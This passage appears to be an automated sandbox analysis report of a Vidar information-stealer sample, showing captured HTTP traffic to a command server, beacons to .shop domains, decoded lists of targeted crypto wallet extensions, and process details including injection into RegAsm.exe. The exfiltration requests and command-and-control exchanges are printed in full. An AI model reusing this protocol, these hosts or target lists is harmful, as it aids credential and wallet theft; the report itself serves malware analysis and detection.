ub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
                                                      Aug 29, 2024 22:53:04.444045067 CEST1164INData Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a
                                                      Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbG
                                                      Aug 29, 2024 22:53:04.451523066 CEST1236INData Raw: 6a 62 32 4e 6a 59 6d 64 69 61 33 42 76 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 4d 48 78 69 61 47 64 6f 62 32 46 74 59 58 42 6a 5a 48 42 69 62 32 68 77 61 47 6c 6e 62 32 39 76 59 57 52 6b 61 57 35 77 61
                                                      Data Ascii: jb2NjYmdia3BvfDF8MHwwfEF1dGhlbnRpY2F0b3J8MHxiaGdob2FtYXBjZHBib2hwaGlnb29vYWRkaW5wa2JhaXwxfDF8MHxHQXV0aCBBdXRoZW50aWNhdG9yfDB8aWxnY25oZWxwY2huY2VlaXBpcGlqYWxqa2JsYmNvYmx8MXwxfDF8VHJvbml1bXwxfHBubmRwbGNia2FrY3Bsa2pub2xnYmtkZ2ppa2plZG5tfDF8MHwwfF
                                                      Aug 29, 2024 22:53:04.451536894 CEST1164INData Raw: 7a 57 45 4d 74 51 6e 4a 76 64 33 4e 6c 63 6e 77 77 66 47 39 69 62 32 39 75 59 57 74 6c 62 57 39 6d 63 47 46 73 59 32 64 6e 61 47 39 6a 5a 6d 39 68 5a 47 39 6d 61 57 52 71 61 32 74 72 66 44 46 38 4d 48 77 77 66 46 4a 70 63 32 55 67 4c 53 42 42 63
                                                      Data Ascii: zWEMtQnJvd3NlcnwwfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfFJpc2UgLSBBcHRvcyBXYWxsZXR8MXxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9wZmdlbG1jbWJpYWphbWVwbm1sb2lqYnBvbGVpYW1hfDF8MHwwfE5pZ2h0bHl8MXxmaW
                                                      Aug 29, 2024 22:53:04.530597925 CEST1048INData Raw: 70 66 44 46 38 59 57 35 76 61 32 64 74 63 47 68 75 59 33 42 6c 61 32 74 6f 59 32 78 74 61 57 35 6e 63 47 6c 74 61 6d 31 6a 62 32 39 70 5a 6d 4a 38 4d 58 77 77 66 44 42 38 53 45 46 57 51 55 67 67 56 32 46 73 62 47 56 30 66 44 46 38 59 32 35 75 59
                                                      Data Ascii: pfDF8YW5va2dtcGhuY3Bla2toY2xtaW5ncGltam1jb29pZmJ8MXwwfDB8SEFWQUggV2FsbGV0fDF8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8MXxvY2pkcG1vYWxsbWdtamJib2dmaWlhb2ZwaGJqZ2NoaHwxfDB8MHxWZW5vbSBXYWxsZXR8MXxvamdnbWNobGdobm
                                                      Aug 29, 2024 22:53:04.532038927 CEST512OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
                                                      Host: 147.45.68.138
                                                      Content-Length: 332
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a
                                                      Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="mode"21------GCBGIIECGHCAKECAFBFH--
                                                      Aug 29, 2024 22:53:05.274430037 CEST282INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:53:05 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180
                                                      Aug 29, 2024 22:53:05.333398104 CEST181OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAF
                                                      Host: 147.45.68.138
                                                      Content-Length: 6301
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:53:05.333420038 CEST6301OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36
                                                      Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------ECBKKKFHCFIDHI
                                                      Aug 29, 2024 22:53:06.000927925 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:53:05 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:53:06.051691055 CEST181OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIE
                                                      Host: 147.45.68.138
                                                      Content-Length: 4677
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:53:06.051706076 CEST4677OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36
                                                      Data Ascii: ------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------JJDHIDBFBFHIJK
                                                      Aug 29, 2024 22:53:06.588227987 CEST178INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:53:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 5block0


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449741188.114.97.34432212C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-29 20:52:37 UTC262OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 8
                                                      Host: awwardwiqi.shop
                                                      2024-08-29 20:52:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                      Data Ascii: act=life
                                                      2024-08-29 20:52:37 UTC802INHTTP/1.1 200 OK
                                                      Date: Thu, 29 Aug 2024 20:52:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=ftr2o93jo0c1o5cko1skhu2icj; expires=Mon, 23-Dec-2024 14:39:16 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=srNlsOGBWNdTLEzqJbi3beZaDGAWUaHyMsega%2FMrFmoQWTeSUfPpWFXze%2FnyZFVS5bL%2Fli2kW52IIAeICLT2PoSVQH2Z%2BB9eoN9pKhvvRF%2FpYsdsg56Fzqsp65Ys2AobI3Q%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8baf6d06fca70f83-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-08-29 20:52:37 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                      Data Ascii: aerror #D12
                                                      2024-08-29 20:52:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449742188.114.97.34432212C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-29 20:52:38 UTC265OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 8
                                                      Host: locatedblsoqp.shop
                                                      2024-08-29 20:52:38 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                      Data Ascii: act=life
                                                      2024-08-29 20:52:38 UTC806INHTTP/1.1 200 OK
                                                      Date: Thu, 29 Aug 2024 20:52:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=1s0hrh50h8l195n4rchsfpkoad; expires=Mon, 23-Dec-2024 14:39:17 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ayhJTIBNr0Roj%2BVdpD3FXp%2BqmFV8AVMtqL0k9A2jS5Il8Q%2FsQTTEYVYtt2h0aDxPo2EwCIDPwRyGGpx2cHjiDVNYmap32ri3jwcDJAGtVV2m927tSkhyFLwhM6%2Bgz8bHnoA9%2FO0%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8baf6d0ce8a30f4b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-08-29 20:52:38 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                      Data Ascii: aerror #D12
                                                      2024-08-29 20:52:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449743188.114.96.34432212C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-29 20:52:39 UTC263OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 8
                                                      Host: traineiwnqo.shop
                                                      2024-08-29 20:52:39 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                      Data Ascii: act=life
                                                      2024-08-29 20:52:39 UTC545INHTTP/1.1 200 OK
                                                      Date: Thu, 29 Aug 2024 20:52:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Frame-Options: SAMEORIGIN
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2FXkuNr%2BYug5GhjTRdPhh2NuMaGjFUiNVdXGmVIYOfiRqaoo7NGb3mUXc9oIQ8kzqitLowjMHXfzH6glitw3B2MWGQcIZxUGZo3cWXS0rYX5oSbwE2W5aVU7lwqh0BmQxkT%2B"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8baf6d12f92c8c27-EWR
                                                      2024-08-29 20:52:39 UTC824INData Raw: 31 31 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                      Data Ascii: 1128<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                      2024-08-29 20:52:39 UTC1369INData Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65
                                                      Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
                                                      2024-08-29 20:52:39 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 66 49 35 33 75 6e 58 52 6c 5a 49 37 53 4e 6f 69 54 39 6f 66 5f 6e 45 58 58 41 4a 42 54 69 70 50 79 5f 71 64 54 67 55 47 75 4c 38 2d 31 37 32 34 39 36 34 37 35 39 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 64 64 6f 73 2f 67 6c 6f 73 73 61 72 79 2f 6d 61 6c 77 61 72 65 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72
                                                      Data Ascii: <input type="hidden" name="atok" value="fI53unXRlZI7SNoiT9of_nEXXAJBTipPy_qdTgUGuL8-1724964759-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-btn" style="backgr
                                                      2024-08-29 20:52:39 UTC838INData Raw: 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20
                                                      Data Ascii: bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
                                                      2024-08-29 20:52:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449745188.114.96.34432212C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-29 20:52:40 UTC353OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cookie: __cf_mw_byp=fI53unXRlZI7SNoiT9of_nEXXAJBTipPy_qdTgUGuL8-1724964759-0.0.1.1-/api
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 42
                                                      Host: traineiwnqo.shop
                                                      2024-08-29 20:52:40 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d
                                                      Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
                                                      2024-08-29 20:52:40 UTC796INHTTP/1.1 200 OK
                                                      Date: Thu, 29 Aug 2024 20:52:40 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=8bqi0bnukar260hbjbvu2r27kq; expires=Mon, 23-Dec-2024 14:39:19 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y68g9%2Fh5RJPC0zHINzo6ON5YERg0m2KWPOvLhIAKzsgwK2L5XFGa5K8pGS3BiSpdr21VSnc%2B4Yde3UhdSQoqi7jh9MfxiSbxDprPfNCXNI%2BwhQCXYxJTxAF23mu2Rt3RKCRO"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8baf6d187d6c8c9c-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-08-29 20:52:40 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                      Data Ascii: aerror #D12
                                                      2024-08-29 20:52:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:16:51:51
                                                      Start date:29/08/2024
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                      Imagebase:0x8d0000
                                                      File size:196'648 bytes
                                                      MD5 hash:5095864CAF019967467C5714897EE419
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:16:51:51
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:16:51:51
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x680000
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:16:52:35
                                                      Start date:29/08/2024
                                                      Path:C:\ProgramData\KKJEBAAECB.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\ProgramData\KKJEBAAECB.exe"
                                                      Imagebase:0x1a0000
                                                      File size:328'744 bytes
                                                      MD5 hash:087F21847D13D50158683C834471728C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:16:52:35
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:16:52:35
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x350000
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:16:52:35
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0xad0000
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:16:52:36
                                                      Start date:29/08/2024
                                                      Path:C:\ProgramData\KJKJJJECFI.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\ProgramData\KJKJJJECFI.exe"
                                                      Imagebase:0xe0000
                                                      File size:196'648 bytes
                                                      MD5 hash:70567FAE269796BF407322D0A4435054
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
